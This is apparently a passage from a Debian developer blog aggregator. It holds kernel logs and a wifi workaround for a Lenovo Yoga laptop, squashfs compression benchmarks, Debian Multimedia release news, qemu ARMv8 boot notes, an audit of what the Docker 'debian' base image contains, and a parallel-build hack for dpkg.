[ 8770.745441] WARNING: CPU: 0 PID: 7206 at drivers/gpu/drm/i915/intel_display.c:9756 intel_check_page_flip+0xd2/0xe0 [i915]()
[ 8770.745444] Kicking stuck page flip: queued at 466186, now 466191
[ 8770.745445] Modules linked in: cpuid rfcomm ctr ccm bnep pci_stub vboxpci(O) vboxnetadp(O) vboxnetflt(O) vboxdrv(O) bridge stp llc xt_conntrack iptable_filter ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack xt_CHECKSUM xt_tcpudp iptable_mangle ip_tables x_tables nls_utf8 nls_cp437 vfat fat rtsx_usb_ms memstick snd_hda_codec_hdmi joydev mousedev hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als hid_sensor_accel_3d hid_sensor_magn_3d hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common iTCO_wdt iTCO_vendor_support hid_multitouch x86_pkg_temp_thermal intel_powerclamp coretemp intel_rapl iosf_mbi kvm_intel kvm btusb hid_sensor_hub bluetooth uvcvideo videobuf2_vmalloc videobuf2_memops
[ 8770.745484]  videobuf2_core v4l2_common videodev media pcspkr evdev mac_hid arc4 psmouse serio_raw efivars i2c_i801 rtl8723be btcoexist rtl8723_common rtl_pci rtlwifi mac80211 snd_soc_rt5640 cfg80211 snd_soc_rl6231 snd_hda_codec_realtek i915 snd_soc_core snd_hda_codec_generic ideapad_laptop ac snd_compress dw_dmac sparse_keymap drm_kms_helper rfkill battery dw_dmac_core snd_hda_intel snd_pcm_dmaengine snd_soc_sst_acpi snd_hda_controller video 8250_dw regmap_i2c snd_hda_codec drm snd_hwdep snd_pcm spi_pxa2xx_platform i2c_designware_platform soc_button_array snd_timer i2c_designware_core snd i2c_algo_bit soundcore shpchp lpc_ich button processor fuse ipv6 autofs4 ext4 crc16 jbd2 mbcache btrfs xor raid6_pq algif_skcipher af_alg dm_crypt dm_mod sg usbhid sd_mod rtsx_usb_sdmmc rtsx_usb crct10dif_pclmul
[ 8770.745536]  crc32_pclmul crc32c_intel ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd ahci libahci libata xhci_pci ehci_pci xhci_hcd ehci_hcd scsi_mod usbcore usb_common thermal fan thermal_sys hwmon i2c_hid hid i2c_core sdhci_acpi sdhci mmc_core gpio_lynxpoint
[ 8770.745561] CPU: 0 PID: 7206 Comm: icedove Tainted: G        W  O    4.0.4+ #14
[ 8770.745563] Hardware name: LENOVO 20344/INVALID, BIOS 96CN29WW(V1.15) 10/16/2014
[ 8770.745565]  0000000000000000 ffffffffa0706f68 ffffffff81522198 ffff88025f203dc8
[ 8770.745569]  ffffffff8106c5b1 ffff880250f83800 ffff880254dcc000 0000000000000000
[ 8770.745572]  0000000000000000 0000000000000000 ffffffff8106c62a ffffffffa0709d50
[ 8770.745575] Call Trace:
[ 8770.745577]  <IRQ>  [<ffffffff81522198>] ? dump_stack+0x40/0x50
[ 8770.745592]  [<ffffffff8106c5b1>] ? warn_slowpath_common+0x81/0xb0
[ 8770.745595]  [<ffffffff8106c62a>] ? warn_slowpath_fmt+0x4a/0x50
[ 8770.745616]  [<ffffffffa06a0bb3>] ? __intel_pageflip_stall_check+0x113/0x120 [i915]
[ 8770.745634]  [<ffffffffa06af042>] ? intel_check_page_flip+0xd2/0xe0 [i915]
[ 8770.745652]  [<ffffffffa067cde1>] ? ironlake_irq_handler+0x2e1/0x1010 [i915]
[ 8770.745657]  [<ffffffff81092d1a>] ? check_preempt_curr+0x5a/0xa0
[ 8770.745663]  [<ffffffff812d66c2>] ? timerqueue_del+0x22/0x70
[ 8770.745668]  [<ffffffff810bb7d5>] ? handle_irq_event_percpu+0x75/0x190
[ 8770.745672]  [<ffffffff8101b945>] ? read_tsc+0x5/0x10
[ 8770.745676]  [<ffffffff810bb928>] ? handle_irq_event+0x38/0x50
[ 8770.745680]  [<ffffffff810be841>] ? handle_edge_irq+0x71/0x120
[ 8770.745685]  [<ffffffff810153bd>] ? handle_irq+0x1d/0x30
[ 8770.745689]  [<ffffffff8152a866>] ? do_IRQ+0x46/0xe0
[ 8770.745694]  [<ffffffff8152866d>] ? common_interrupt+0x6d/0x6d
[ 8770.745695]  <EOI>  [<ffffffff8152794d>] ? system_call_fastpath+0x16/0x1b
[ 8770.745701] ---[ end trace 8e339004db29883a ]---

In my case, the laptop came with the Realtek Wireless device (details above in lspci output). Note: The machine has no wired interface.

While the Intel Wifi devices shipped with this laptop have their own share of problems, this device (rtl8723be) works out of the box. But only for a while. There is no certain pattern on what triggers the bug, but once triggered, the network just freezes. Nothing is logged.

If your Yoga 2 13 came with the RTL chip, the following workaround may help avoid the network issues.

rrs@learner:/media/SSHD/tmp$ cat /etc/modprobe.d/rtl8723be.conf
options rtl8723be fwlps=0

Almost every boot, eventually, the kernel reports MCE errors. Not something I understand well, but so far, it hasn't caused any visible issues. And from what I have googled so far, nobody seems to have fixed it anywhere

So, with fingers crossed, lets just hope this never translates into a real problem.

What the kernel reports of the CPU's capabilities.

[    0.041496] mce: CPU supports 7 MCE banks
[  299.540930] mce: [Hardware Error]: Machine check events logged

The MCE logs extracted from the buffer.

mcelog: failed to prefill DIMM database from DMI data
Hardware event. This is not a software error.
MISC 38a0000086 ADDR fef81880
TIME 1432455005 Sun May 24 13:40:05 2015
MCG status:
MCi status:
Error overflow
Uncorrected error
MCi_MISC register valid
MCi_ADDR register valid
Processor context corrupt
MCA: corrected filtering (some unreported errors in same region)
Generic CACHE Level-2 Generic Error
STATUS ee0000000040110a MCGSTATUS 0
CPUID Vendor Intel Family 6 Model 69
Hardware event. This is not a software error.
MISC 78a0000086 ADDR fef81780
TIME 1432455005 Sun May 24 13:40:05 2015
MCG status:
MCi status:
Uncorrected error
MCi_MISC register valid
MCi_ADDR register valid
Processor context corrupt
MCA: corrected filtering (some unreported errors in same region)
Generic CACHE Level-2 Generic Error
STATUS ae0000000040110a MCGSTATUS 0
CPUID Vendor Intel Family 6 Model 69
Hardware event. This is not a software error.
MISC 38a0000086 ADDR fef81880
TIME 1432455114 Sun May 24 13:41:54 2015
MCG status:
MCi status:
Error overflow
Uncorrected error
MCi_MISC register valid
MCi_ADDR register valid
Processor context corrupt
MCA: corrected filtering (some unreported errors in same region)
Generic CACHE Level-2 Generic Error
STATUS ee0000000040110a MCGSTATUS 0
CPUID Vendor Intel Family 6 Model 69
Hardware event. This is not a software error.
MISC 78a0000086 ADDR fef81780
TIME 1432455114 Sun May 24 13:41:54 2015
MCG status:
MCi status:
Uncorrected error
MCi_MISC register valid
MCi_ADDR register valid
Processor context corrupt
MCA: corrected filtering (some unreported errors in same region)
Generic CACHE Level-2 Generic Error
STATUS ae0000000040110a MCGSTATUS 0
CPUID Vendor Intel Family 6 Model 69



6 April 2015

Jonathan Carter: Squashfs Performance Testing

Experiments Last week I discovered The Fan Club s Experiments page. It reminds me of the Debian Experiments community on Google+. I like the concept of trying out all kinds of different things and reporting back to the community on how it works. I ve been meaning to do more of that myself so this is me jumping in and reporting back on something I ve been poking at this weekend. Introducing Squashfs Squashfs is a read-only compressed filesystem commonly used on embedded devices, Linux installation media and remote file systems (as is done in LTSP). Typically, a system like tmpfs, unionfs or aufs is mounted over this read-only system to make it usable as a root filesystem. It has plenty of other use cases too but for the purposes of this entry we ll stick with those use cases in mind. It supports gzip, lzo and xz(lzma) as compression back-ends. It also supports block sizes from 4K up to 1M. Compression technique as well as block size can have major effects on both performance and file size. In most cases the defaults will probably be sufficient, but if you want to find a good balance between performance and space saving, then you ll need some more insight. My Experiment: Test effects of squashfs compression methods and block sizes I m not the first person to have done some tests on squashfs performance and reported on it. Bernhard Wiedemann and the Squashfs LZMA project have posted some results before, and while very useful I want more information (especially compress/uncompress times). I was surprised to not find a more complete table elsewhere either. Even if such a table existed, I probably wouldn t be satisfied with it. Each squashfs is different and it makes a big difference whether it contains already compressed information or largely uncompressed information like clear text. I d rather be able to gather compression ratio/times for a specific image rather than for one that was used for testing purposes once-off. So, I put together a quick script that takes a squashfs image, extracts it to tmpfs, and then re-compressing it using it all the specified compression techniques and block sizes and then uncompressing those same images for their read speeds. My Testing Environment For this post, I will try out my script on the Ubuntu Desktop 14.04.2 LTS squashfs image. It s a complex image that contains a large mix of different kinds of files. I m extracting it to RAM since I want to avoid having disk performance as a significant factor. I m compressing the data back to SSD and extracting from there for read speed tests. The SSD seems fast enough not to have any significant effect on the tests. If you have a slow storage, the results of the larger images (with smaller block sizes) may be skewed unfavourably. As Bernhard mentioned on his post, testing the speed of your memory can also be useful, especially when testing on different kinds of systems and comparing the results:
# dd if=/dev/zero of=/dev/null bs=1M count=100000
104857600000 bytes (105 GB) copied, 4.90059 s, 21.4 GB/s
CPU is likely to be your biggest bottleneck by far when compressing. mksquashfs is SMP aware and will use all available cores by default. I m testing this on a dual core Core i7 laptop with hyper-threading (so squashfs will use 4 threads) and with 16GB RAM apparently transferring around 21GB/s. The results of the squashfs testing script will differ greatly based on the CPU cores, core speed, memory speed and storage speed of the computer you re running it on, so it shouldn t come as a surprise if you get different results than I did. If you don t have any significant bottleneck (like slow disks, slow CPU, running out of RAM, etc) then your results should more or less correspond in scale to mine for the same image. How to Run It Create a directory and place the filesystem you d like to test as filesystem.squashfs, then:
$ apt-get install squashfs-tools 
$ wget
$ bash
With the default values in that file, you ll end up with 18 squashfs images taking up about 18GB of disk space. I keep all the results for inspection, but I ll probably adapt/fix the script to be more friendly to disk space usage some time. You should see output that look something like this, with all the resulting data in the ./results directory.
* Setting up...
- Testing gzip
  * Running a squashfs using compression gzip, blocksize 4096
  * Running a squashfs using compression gzip, blocksize 8192
  * Running a squashfs using compression gzip, blocksize 16384
- Testing lzo
  * Running a squashfs using compression lzo, blocksize 4096
  * Running a squashfs using compression lzo, blocksize 8192
  * Running a squashfs using compression lzo, blocksize 16384
- Testing xz
  * Running a squashfs using compression xz, blocksize 4096
  * Running a squashfs using compression xz, blocksize 8192
  * Running a squashfs using compression xz, blocksize 16384
* Testing uncompressing times...
  * Reading results/squashfs-gzip-131072.squashfs...
  * Reading results/squashfs-gzip-16384.squashfs...
  * Reading results/squashfs-gzip-32768.squashfs...
* Cleaning up...
On to the Results The report script will output the results into CSV. Here s the table with my results. Ratio is percentage of the size of the original uncompressed data, CTIME and UTIME is compression time and uncompress time for the entire image.
Filename Size Ratio CTIME UTIME
squashfs-gzip-4096.squashfs 1137016 39.66% 0m46.167s 0m37.220s
squashfs-gzip-8192.squashfs 1079596 37.67% 0m53.155s 0m35.508s
squashfs-gzip-16384.squashfs 1039076 36.27% 1m9.558s 0m26.988s
squashfs-gzip-32768.squashfs 1008268 35.20% 1m30.056s 0m30.599s
squashfs-gzip-65536.squashfs 987024 34.46% 1m51.281s 0m35.223s
squashfs-gzip-131072.squashfs 975708 34.07% 1m59.663s 0m22.878s
squashfs-gzip-262144.squashfs 970280 33.88% 2m13.246s 0m23.321s
squashfs-gzip-524288.squashfs 967704 33.79% 2m11.515s 0m24.865s
squashfs-gzip-1048576.squashfs 966580 33.75% 2m14.558s 0m28.029s
squashfs-lzo-4096.squashfs 1286776 44.88% 1m36.025s 0m22.179s
squashfs-lzo-8192.squashfs 1221920 42.64% 1m49.862s 0m21.690s
squashfs-lzo-16384.squashfs 1170636 40.86% 2m5.008s 0m20.831s
squashfs-lzo-32768.squashfs 1127432 39.36% 2m23.616s 0m20.597s
squashfs-lzo-65536.squashfs 1092788 38.15% 2m48.817s 0m21.164s
squashfs-lzo-131072.squashfs 1072208 37.43% 3m4.990s 0m20.563s
squashfs-lzo-262144.squashfs 1062544 37.10% 3m26.816s 0m15.708s
squashfs-lzo-524288.squashfs 1057780 36.93% 3m32.189s 0m16.166s
squashfs-lzo-1048576.squashfs 1055532 36.85% 3m42.566s 0m17.507s
squashfs-xz-4096.squashfs 1094880 38.19% 5m28.104s 2m21.373s
squashfs-xz-8192.squashfs 1002876 34.99% 5m15.148s 2m1.780s
squashfs-xz-16384.squashfs 937748 32.73% 5m11.683s 1m47.878s
squashfs-xz-32768.squashfs 888908 31.03% 5m17.207s 1m43.399s
squashfs-xz-65536.squashfs 852048 29.75% 5m27.819s 1m38.211s
squashfs-xz-131072.squashfs 823216 28.74% 5m42.993s 1m29.708s
squashfs-xz-262144.squashfs 799336 27.91% 6m30.575s 1m16.502s
squashfs-xz-524288.squashfs 778140 27.17% 6m58.455s 1m20.234s
squashfs-xz-1048576.squashfs 759244 26.51% 7m19.205s 1m28.721s
Some notes:

19 January 2015

Daniel Pocock: jSMPP project update, 2.1.1 and 2.2.1 releases

The jSMPP project on Github stopped processing pull requests over a year ago and appeared to be needing some help. I've recently started hosting it under and tried to merge some of the backlog of pull requests myself. There have been new releases:
  • 2.1.1 works in any project already using 2.1.0. It introduces bug fixes only.
  • 2.2.1 introduces some new features and API changes and bigger bug fixes
The new versions are easily accessible for Maven users through the central repository service. Apache Camel has already updated to use 2.1.1. Thanks to all those people who have contributed to this project throughout its history.

23 October 2014

Alessio Treglia: Bits from the Debian Multimedia Maintainers

This brief announcement was released yesterday to the debian-devel-announce mailing list. Ciao! The Debian Multimedia Maintainers have been quite active since the Wheezy release, and have some interesting news to share for the Jessie release. Here we give you a brief update on what work has been done and work that is still ongoing. Let s see what s cooking for Jessie then. Frameworks and libraries Support for many new media formats and codecs. The codec library libavcodec, which is used by popular media playback applications including vlc, mpv, totem (using gstreamer1.0-libav), xine, and many more, has been updated to the latest upstream release version 11 provided by Libav. This provides Debian users with HEVC playback, a native Opus decoder, Matroska 3D support, Apple ProRes, and much more. Please see libav s changelog for a full list of functionality additions and updates. libebur128 libebur128 is a free implementation of the European Broadcasting Union Loudness Recommendation (EBU R128), which is essentially an alternative to ReplayGain. The library can be used to analyze audio perceived loudness and subsequentially normalize the volume during playback. libltc libltc provides functionalities to encode and decode Linear (or Longitudinal) Timecode (LTC) from/to SMPTE data timecode. libva libva and the driver for Intel GPUs has been updated to the 1.4.0 release. Support for new GPUs has been added. libva now also supports Wayland. Pure Data A number of new additional libraries (externals) will appear in Jessie, including (among others) Eric Lyon s fftease and lyonpotpourrie, Thomas Musil s iemlib, the pdstring library for string manipulation and pd-lua that allows to write Pd-objects in the popular lua scripting language. JACK and LADI LASH Audio Session Handler was abandoned upstream a long time ago in favor of the new session management system, called ladish (LADI Session Handler). ladish allows users to run many JACK applications at once and save/restore their configuration with few mouse clicks. The current status of the integration between the session handler and JACK may be summarized as follows: Note that ladish uses the D-Bus interface to the jack daemon, therefore only Jessie s jackd2 provides support for and also cooperates fine with it. Plugins: LV2 and LADSPA Debian Jessie will bring the newest 1.10.0 version of the LV2 technology. Most changes affect the packaging of new plugins and extensions, a brief list of packaging guidelines is now available.
A number of new plugins and development tools too have been made available during the Jessie development cycle: LV2 Toolkit LVTK provides libraries that wrap the LV2 C API and extensions into easy to use C++ classes. The original work for this was mostly done by Lars Luthman in lv2-c++-tools. Vee One Suite The whole suite by Rui Nuno Capela is now available in Jessie, and consists of three components: All three are provided in both forms of LV2 plugins and stand-alone JACK client. JACK session, JACK MIDI, and ALSA MIDI are supported too. x42-plugins and zam-plugins LV2 bundles containing many audio plugins for high quality processing. Fomp Fomp is an LV2 port of the MCP, VCO, FIL, and WAH plugins by Fons Adriaensen. Some other components have been upgraded to more recent upstream versions: We ve packaged ste-plugins, Fons Adriaensen s new stereo LADSPA plugins bundle. A major upgrade of frei0r, namely the standard collection for the minimalistic plugin API for video effects, will be available in Jessie. New multimedia applications Advene Advene (Annotate Digital Video, Exchange on the NEt) is a flexible video
annotation application. Ardour3 The new generation of the popular digital audio workstation will make its very first appearance in Debian Jessie. Cantata Qt4 front-end for the MPD daemon. Csound Csound for jessie will feature the new major series 6, with the improved IDE CsoundQT. This new csound supports improved array data type handling, multi-core rendering and debugging features. din DIN Is Noise is a musical instrument and audio synthesizer that supports JACK audio output, MIDI, OSC, and IRC bot as input sources. It could be extended and customized with Tcl scripts too. dvd-slideshow dvd-slideshow consists of a suite of command line tools which come in handy to make slideshows from collections of pictures. Documentation is provided and available in /usr/share/doc/dvd-slideshow/ . dvdwizard DVDwizard can fully automate the creation of DVD-Video filesystem. It supports graphical menus, chapters, multiple titlesets and multi-language streams. It supports both PAL and NTSC video modes too. flowblade Flowblade is a video editor like the popular KDenlive based on the MLT engine, but more lightweight and with some difference in editing concepts. forked-daapd Forked-daapd switched to a new, active upstream again dropping Grand Central Dispatch in favor of libevent. The switch fixed several bugs and made forked-daapd available on all release architectures instead of shipping only on amd64 and i386. Now nothing prevents you from setting up a music streaming (DAAP/DACP) server on your favorite home server no matter if it is based on mips, arm or x86! harvid HTTP Ardour Video Daemon decodes still images from movie files and serves them via HTTP. It provides frame-accurate decoding and is main use-case is to act as backend and second level cache for rendering the
videotimeline in Ardour. Groove Basin Groove Basin is a music player server with a web-based user interface inspired by Amarok 1.4. It runs on a server optionally connected to speakers. Guests can control the music player by connecting with a laptop, tablet, or smart phone. Further, users can stream their music libraries remotely.
It comes with a fast, responsive web interface that supports keyboard shortcuts and drag drop. It also provides the ability to upload songs, download songs, and import songs by URL, including YouTube URLs. Groove Basin supports Dynamic Mode which automatically queues random songs, favoring songs that have not been queued recently.
It automatically performs ReplayGain scanning on every song using the EBU R128 loudness standard, and automatically switches between track and album mode. Groove Basin supports the MPD protocol, which means it is compatible with MPD clients. There is also a more powerful Groove Basin protocol which you can use if the MPD protocol does not meet your needs. HandBrake HandBrake, a versatile video transcoder, is now available for Jessie. It could convert video from nearly any format to a wide range of commonly supported codecs. jack-midi-clock New jackd midiclock utility made by Robin Gareus. laborejo Laborejo, Esperanto for Workshop , is used to craft music through notation. It is a LilyPond GUI frontend, a MIDI creator and a tool collection to inspire and help music composers. mpv mpv is a movie player based on MPlayer and mplayer2. It supports a wide variety of video file formats, audio and video codecs, and subtitle types. The project focuses mainly on modern systems and encourages developer activity. As such, large portions of outdated code originating from MPlayer have been removed, and many new features and improvements have been added. Note that, although there are still some similarities to its predecessors, mpv should be considered a completely different program (e.g. lacking compatibility with both mplayer and mplayer2 in terms of command-line arguments and configuration). smtube SMTube is a stand-alone graphical video browser and player, which makes YouTube s videos browsing, playing, and download such a piece of cake.
It has so many features that, we are sure, will make YouTube lovers very, very happy. sonic-visualiser Sonic Visualiser Application for viewing and analysing the contents of music audio files. SoundScapeRenderer SoundScapeRenderer (aka SSR) is a (rather) easy to use render engine for spatial audio, that provides a number of different rendering algorithms, ranging from binaural (headphone) playback via wave field synthesis to higher-order ambisonics. Videotrans videotrans is a set of scripts that allow its user to reformat existing movies into the VOB format that is used on DVDs. XBMC XBMC has been partially rebranded as XBMC from Debian to make it clear that it is changed to conform to Debian s Policy. The latest stable release, 13.2 Gotham will be part of Jessie making Debian a good choice for HTPC-s. zita-bls1 Binaural stereo signals converter made by Fons Adriaensen zita-mu1 Stereo monitoring organiser for jackd made by Fons Adriaensen zita-njbridge Jack clients to transmit multichannel audio over a local IP network made by Fons Adriaensen radium-compressor Radium Compressor is the system compressor of the Radium suite. It is provided in the form of stand-alone JACK application. Multimedia Tasks With Jessie we are shipping a set of multimedia related tasks.
They include package lists for doing several multimedia related tasks. If you are interested in defining new tasks, or tweaking the current, existing ones, we are very much interested in hearing from you. Upgraded applications and libraries What s not going to be in Jessie With the aim to improve the overall quality of the multimedia software available in Debian, we have dropped a number of packages which were abandoned upstream: We ve also dropped mplayer, presently nobody seems interested in maintaining it.
The suggested replacements for users are mplayer2 or mpv. Whilst the former is mostly compatible with mplayer in terms of command-line arguments and configuration (and adds a few new features too), the latter adds a lot of new features and improvements, and it is actively maintained upstream. Please note that although the mencoder package is no longer available anymore, avconv and mpv do provide encoding functionality. For more information see avconv s manual page and documentation, and mpv s encoding documentation. Broken functionalities rtkit under systemd is broken at the moment. Activity statistics More information about team s activity are available. Where to reach us The Debian Multimedia Maintainers can be reached at pkg-multimedia-maintainers AT for packaging related topics, or at debian-multimedia AT for user and more general discussion.
We would like to invite everyone interested in multimedia to join us there. Some of the team members are also in the #debian-multimedia channel on OFTC. Cheers! Alessio Treglia
on behalf of the Debian Multimedia Maintainers

28 September 2014

Clint Adams: Banana Pi is a real thing

Now that I've almost caught up with life after an extended stint on the West Coast, it's time to play. Like Gunnar, I acquired a Banana Pi courtesy of LeMaker. My GuruPlug (courtesy me) and my Excito B3 (courtesy the lovely people at Tor) are giving me a bit of trouble in different ways, so my intent is to decommission and give away the GuruPlug and Excito B3, leaving my DreamPlug and the Banana Pi to provide the services currently performed by the GuruPlug, Excito B3, and DreamPlug. The Banana Pi is presently running Bananian on a 32G SDHC (Class 10) card. This is close to wheezy, and appears to have a mostly-sane default configuration, but I am not going to trust some random software downloaded off the Internet on my home network, so I need to be able to run Debian on it instead. My preliminary belief is that the two main obstacles are Linux and U-Boot. Bananian 14.09 comes with Linux 3.4.90+ #1 SMP PREEMPT Fri Sep 12 18:13:45 CEST 2014 armv7l GNU/Linux, whatever that is, and U-Boot SPL 2014.04-10694-g2ae8b32 (Sep 03 2014 - 20:53:14). I don't yet know what the status of mainline/Debian support is. Someone gave me a wooden cigar box to use as a case, which is not working out quite as hoped. I also found that my hack to power a 3.5" SATA drive does not work, so I'll either need to hammer on that some more or resolve to use a 2.5" drive instead. memory:
Mem:        993700      36632     957068          0       2248      11136
-/+ buffers/cache:      23248     970452
Swap:       524284       1336     522948
Processor       : ARMv7 Processor rev 4 (v7l)
processor       : 0
BogoMIPS        : 1192.96
processor       : 1
BogoMIPS        : 1197.05
Features        : swp half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt 
CPU implementer : 0x41
CPU architecture: 7
CPU variant     : 0x0
CPU part        : 0xc07
CPU revision    : 4
Hardware        : sun7i
Revision        : 0000
Serial          : 03c32de75055484880485278165166c9

13 August 2014

Riku Voipio: Booting Linaro ARMv8 OE images with Qemu

A quick update - Linaro ARMv8 OpenEmbbeded images work just fine with qemu 2.1 as well:

$ qemu-system-aarch64 -m 1024 -cpu cortex-a57 -nographic -machine virt \
-kernel Image -append 'root=/dev/vda2 rw rootwait mem=1024M console=ttyAMA0,38400n8' \
-drive if=none,id=image,file=vexpress64-openembedded_lamp-armv8-gcc-4.9_20140727-682.img \
-netdev user,id=user0 -device virtio-net-device,netdev=user0 -device virtio-blk-device,drive=image
[ 0.000000] Linux version 3.16.0-1-linaro-vexpress64 (buildslave@x86-64-07) (gcc version 4.8.3 20140401 (prerelease) (crosstool-NG linaro-1.13.1-4.8-2014.04 - Linaro GCC 4.8-2014.04) ) #1ubuntu1~ci+140726114341 SMP PREEMPT Sat Jul 26 11:44:27 UTC 20
[ 0.000000] CPU: AArch64 Processor [411fd070] revision 0
Quick benchmarking with age-old ByteMark nbench:
Index Qemu Foundation Host
Memory 4.294 0.712 44.534
Integer 6.270 0.686 41.983
Float 1.463 1.065 59.528
Baseline (LINUX) : AMD K6/233*
Qemu is upto 8x faster than Foundation model on Integers, but only 50% faster on Math. Meanwhile, the Host pc spends 7-40x slower emulating ARMv8 than executing native instructions.

5 August 2014

Riku Voipio: Testing qemu 2.1 arm64 support

Qemu 2.1 was just released a few days ago, and is now a available on Debian/unstable. Trying out an (virtual) arm64 machine is now just a few steps away for unstable users:

$ sudo apt-get install qemu-system-arm
$ wget
$ wget
$ qemu-system-aarch64 -m 1024 -cpu cortex-a57 -nographic -machine virt -kernel trusty-server-cloudimg-arm64-vmlinuz-generic \
-append 'root=/dev/vda1 rw rootwait mem=1024M console=ttyAMA0,38400n8 init=/usr/lib/cloud-init/uncloud-init ds=nocloud ubuntu-pass=randomstring' \
-drive if=none,id=image,file=trusty-server-cloudimg-arm64-disk1.img \
-netdev user,id=user0 -device virtio-net-device,netdev=user0 -device virtio-blk-device,drive=image
[ 0.000000] Linux version 3.13.0-32-generic (buildd@beebe) (gcc version 4.8.2 (Ubuntu/Linaro 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:52:14 UTC 2014 (Ubuntu 3.13.0-32.57-generic
[ 0.000000] CPU: AArch64 Processor [411fd070] revision 0
ubuntu@ubuntu:~$ cat /proc/cpuinfo
Processor : AArch64 Processor rev 0 (aarch64)
processor : 0
Features : fp asimd evtstrm
CPU implementer : 0x41
CPU architecture: AArch64
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0

Hardware : linux,dummy-virt
The "init=/usr/lib/cloud-init/uncloud-init ds=nocloud ubuntu-pass=randomstring" is ubuntu cloud stuff that will set the ubuntu user password to "randomstring" - don't use "randomstring" literally there, if you are connected to internets... For more detailed writeup of using qemu-system-aarch64, check the excellent writeup from Alex Bennee.

19 June 2014

Joey Hess: what does run -it debian sh run?

When you type run -it debian sh, it goes off and gets "debian" and runs it. But what is in this "debian" image? How was it built? The docker hub does not really say. All it tells us is this is a "(Semi) Official Debian base image" and that its sources.list uses for geolocation. There's a link to which in turn uses a very strange git repository, owned by Debian maintainer Tianon Gravi, that contains compressed tarballs of Debian: "Git is not a fan of what we're doing here." The "source", such as it is, that is used to build this image consists of:
FROM scratch
ADD rootfs.tar.xz /
CMD ["/bin/bash"]
and -t tianon/debian:wheezy -d . debootstrap --variant=minbase --components=main --include=inetutils-ping,iproute wheezy
I don't know where is. [Update: Probably /usr/share/ or a modified version] And anyway, I have no reason to trust that this image is built the way it claims to be built. So, the question remains: What is in this image? To find out, I did a debootstap --variant=minbase stable and diffed the entire docker debian image against it. The diff was 6738 lines, from which I found the following interesting differences. added packages The image has iputils-ping and netbase and iproute added. These are not in a minbase debootstrap, but are in a regular debootstrap. It's rather weird that the docker image is based on a minbase debootstrap, since this means they have to add back important stuff like this on an ad-hoc basis.
If the expectation is that an experienced Unix person who found it missing would say "What on earth is going on, where is 'foo'?", it must be an 'important' package. -- Debian Policy
apt hooks
DPkg::Post-Invoke   "rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin   true";  ;
APT::Update::Post-Invoke   "rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin   true";  ;
Dir::Cache::pkgcache "";
Dir::Cache::srcpkgcache "";
Acquire::Languages "none";
These are some strange modifications to apt's config. The intent is clearly to avoid wasting disk space, even at the expense of making apt slower (by disabling caches) and losing translations. I am curious if apt might ever invoke the DPkg::Post-Invoke twice in an upgrade in which it runs dpkg twice. I'm also curious whether deleting /var/cache/apt/archives/lock could cause a problem. unsafe-io dpkg is configured to use unsafe-io. motd
Linux viper 3.12.20-gentoo #1 SMP Sun May 18 12:36:24 MDT 2014 x86_64
Yes, that's "gentoo". Presumably this tells us something about the build host. policy-rc.d /usr/sbin/policy-rc.d contains "exit 101", which prevents daemons from being automatically started after they are installed. This may or may not be desirable, depending on what you're doing with docker. It notably also prevents restarting running daemons in this container if they're upgraded for eg, a security fix. It would almost certianly be better if this script allowed restarting running daemons. diversions /sbin/initctl is diverted and replaced with /bin/true. This is a workaround for a bug in sysvinit; when upgraded inside a docker container it hangs while trying to run initctl. missing devices Some versions of the debian image are missing things in /dev. See this bug. (I had listed some device files that I thought were missing, but I was wrong.) some gpg thing is different
Binary files pure-debootstrap/etc/apt/trustdb.gpg and from-docker/etc/apt/trustdb.gpg differ
Oh well, that can't be important.. Or can it? I did not check. conclusions I would hardly consider this to be an "(Semi) Official Debian image". Some of the changes are quite dubious. The build environment is not Debian. There is no guarantee you'll get the same image I examined. Diffing thousands of lines of filesystem changes is not particularly fun or reliable way to spot accidental or malicious changes. I'd recommend only trusting docker images you build yourself. I have some docker images published somewhere that are built with 100% straight debootstrap with no modifications (and even an armel image that can be used on an x86 system thanks to qemu). But I'm not going to link to them, because again, you should only trust docker images you built yourself. To help increase your mistrust of me, I present this IRC snippet:
<joeyh> I'll bet I could publish an image that just did a killall5 as root on startup and get plenty of people to nuke their container hosts
Here are some ideas for things Debian could do to improve this: PS, if this wasn't enough fun, just consider the tweaks made to the "Debian" images on all the VPS hosts out there.

13 May 2014

Hideki Yamane: rpm % ?_smp_flags macro for dpkg-buildpackage

I've watched openSUSE Conference video and been interested in RPM packaging workshop. Some features are nice, so I'd like to introduce one of those.

He says
Using % ?_smp_flags can speed up your build a lot.
Above RPM macro enables SMP, use all CPU cores to build package and it looks good. We can easily buy multi core processor machine nowadays even if it is cheapest laptop.

In Debian, we can do parallel build by specifiying DEBBUILDOPT=-"j<job number>" in /etc/pbuilderrc and run pbuilder/cowbuilder, but this % ?_smp_flags can automatically use multiple cores without any setting, good. However, add % ?_smp_flags to each rpm spec file, it means that we need to modify each source package, is not handy.

Then back to Debian, I've made a quick hack to dpkg-buildpackage (disclaimer: I'm Perl beginner, you know :).

- Automatically use all CPU cores to build package, faster build.

- some package would be FTBFS (e.g. Bug#694726) but it should be fixed, right? ;)

It may break some builds but "enable multiple build by default, and specify single build exceptions to each problematic packages" is better, IMHO.

Any suggestions are welcome, of course.

